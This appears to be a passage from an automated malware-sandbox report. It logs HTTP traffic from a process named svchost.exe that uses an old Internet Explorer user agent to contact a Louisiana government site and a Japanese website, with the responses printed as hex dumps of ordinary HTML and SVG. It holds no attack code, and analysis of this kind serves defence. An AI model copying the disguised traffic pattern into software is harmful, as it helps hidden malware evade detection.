                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC715INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC715INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      44192.168.2.56256049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC717OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1755INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:54 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 2599149
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                                                      ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC1756INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2059INData Raw: 31 36 38 7b 66 69 6c 6c 3a 23 66 35 64 61 32 38 3b 7d 2e 63 6c 73 2d 31 36 30 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a
                                                                                                                                                                                                                                                                                                      Data Ascii: 168{fill:#f5da28;}.cls-160{stroke-width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:55 UTC2075INData Raw: 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                                      Data Ascii: 25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2219INData Raw: 38 39 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 89,0,2.1,2.1,0,0,1,.16,2.85"/><path class="cls-4" d="M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2235INData Raw: 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30
                                                                                                                                                                                                                                                                                                      Data Ascii: 27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2251INData Raw: 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37
                                                                                                                                                                                                                                                                                                      Data Ascii: .51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2267INData Raw: 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34
                                                                                                                                                                                                                                                                                                      Data Ascii: 2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2332INData Raw: 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                                      Data Ascii: .52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2348INData Raw: 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32
                                                                                                                                                                                                                                                                                                      Data Ascii: 1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2364INData Raw: 22 20 64 3d 22 4d 38 37 39 2e 37 34 2c 32 39 39 2e 37 37 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 37 39 2c 33 30 32 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: " d="M879.74,299.77A1.72,1.72,0,0,1,879,302a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2380INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 36 35 2c 31 37 34 2e 32 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: "/><path class="cls-4" d="M896.65,174.25a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2396INData Raw: 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32
                                                                                                                                                                                                                                                                                                      Data Ascii: .12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M927.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2412INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 36 2e 38 38 2c 31 36 33 2e 37 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38
                                                                                                                                                                                                                                                                                                      Data Ascii: ><path class="cls-4" d="M1026.88,163.74a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2428INData Raw: 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 34 36 2c 32 39 34 2e 31 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 6-2.82"/><path class="cls-4" d="M1010.46,294.18a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2510INData Raw: 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39
                                                                                                                                                                                                                                                                                                      Data Ascii: 6,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09
